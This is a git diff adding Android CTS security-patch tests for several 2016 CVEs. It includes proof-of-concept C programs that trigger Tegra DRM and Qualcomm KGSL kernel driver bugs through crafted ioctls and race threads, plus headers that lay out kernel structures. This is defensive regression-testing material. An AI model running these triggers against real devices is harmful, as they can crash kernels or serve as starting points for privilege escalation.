+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
new file mode 100644
index 0000000..1cc0f29
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 1
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+
+struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+ gem_create.size = PAGE_SIZE;
+ return 0;
+}
+
+int main()
+{
+ int ret;
+ int i;
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].cmdbuf.offset = 8192;
+ relocs[i].target.handle = gem_create.handle;
+ relocs[i].target.offset = 8192;
+ }
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }else{
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
new file mode 100644
index 0000000..614d20b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8432
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
new file mode 100644
index 0000000..52b48f2
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 100
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+volatile struct drm_gem_close gem_close;
+
+volatile struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+volatile struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static int prepare()
+{
+ int i;
+
+ open_c.client = HOST1X_CLASS_VIC;
+
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+
+ gem_close.handle = 1;
+
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = 0;
+ relocs[i].cmdbuf.handle = 0;
+ relocs[i].cmdbuf.offset = 0;
+ relocs[i].target.handle = 0;
+ relocs[i].target.offset = 0;
+ }
+
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+
+ gem_create.size = PAGE_SIZE;
+
+ return 0;
+}
+
+#define SUBMIT_THREAD_NUM 1
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+static void* submit_thread(void *no_use)
+{
+ set_affinity(1);
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ return NULL;
+}
+
+int main()
+{
+ int ret;
+ int i;
+ __u64 try_time;
+
+ set_affinity(0);
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ try_time = 1;
+ while(1){
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].target.handle = gem_create.handle;
+ }
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ }
+ usleep(150);
+ while(ioctl(dev_fd, DRM_IOCTL_GEM_CLOSE, &gem_close) == 0);
+ }
+ try_time++;
+ }
+
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_join(submit_thread_id[i], NULL);
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
new file mode 100644
index 0000000..6b20fe4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8434
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
new file mode 100644
index 0000000..b81ee0c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
@@ -0,0 +1,153 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define KGSL_CONTEXT_SAVE_GMEM 0x00000001
+#define KGSL_CONTEXT_NO_GMEM_ALLOC 0x00000002
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SUBMIT_IB_LIST 0x00000004
+#define KGSL_CONTEXT_CTX_SWITCH 0x00000008
+#define KGSL_CONTEXT_PREAMBLE 0x00000010
+#define KGSL_CONTEXT_TRASH_STATE 0x00000020
+#define KGSL_CONTEXT_PER_CONTEXT_TS 0x00000040
+#define KGSL_CONTEXT_USER_GENERATED_TS 0x00000080
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_END_OF_FRAME 0x00000100
+#define KGSL_CONTEXT_NO_FAULT_TOLERANCE 0x00000200
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SYNC 0x00000400
+#define KGSL_CONTEXT_PWR_CONSTRAINT 0x00000800
+
+#define KGSL_IOC_TYPE 0x09
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id; /*output param */
+};
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+ unsigned int drawctxt_id;
+};
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+ _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+struct kgsl_timestamp_event {
+ int type; /* Type of event (see list below) */
+ unsigned int timestamp; /* Timestamp to trigger event on */
+ unsigned int context_id; /* Context for the timestamp */
+ void __user *priv; /* Pointer to the event specific blob */
+ size_t len; /* Size of the event specific blob */
+};
+#define IOCTL_KGSL_TIMESTAMP_EVENT \
+ _IOWR(KGSL_IOC_TYPE, 0x33, struct kgsl_timestamp_event)
+int g_fd = -1;
+int g_ctx_id = -1;
+int g_sync_fence_fd = -1;
+struct kgsl_timestamp_event g_event;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+void trigger_kgsl_create_drawctx() {
+ struct kgsl_drawctxt_create ctx;
+ ctx.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx);
+ g_ctx_id = ctx.drawctxt_id;
+}
+
+void trigger_kgsl_free_drawctx(int id) {
+ struct kgsl_drawctxt_destroy ctx;
+ ctx.drawctxt_id = id;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &ctx);
+
+}
+
+void trigger_kgsl_timestamp_event() {
+ ioctl(g_fd, IOCTL_KGSL_TIMESTAMP_EVENT, &g_event);
+}
+
+int open_driver() {
+ char* dev_path = "/dev/kgsl-3d0";
+ g_fd = open(dev_path, O_RDWR);
+ return g_fd;
+}
+
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+}
+
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ close(4);
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(-19, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ trigger_kgsl_create_drawctx();
+
+ g_event.type = 2;
+ g_event.context_id = g_ctx_id;
+ g_event.len = 4;
+ g_event.priv = malloc(0x1000);
+ g_event.timestamp = 0;
+ mprotect(g_event.priv, 0x1000, PROT_READ);
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_kgsl_timestamp_event();
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
new file mode 100644
index 0000000..62efb65
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8435
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
new file mode 100644
index 0000000..70574fe
--- /dev/null
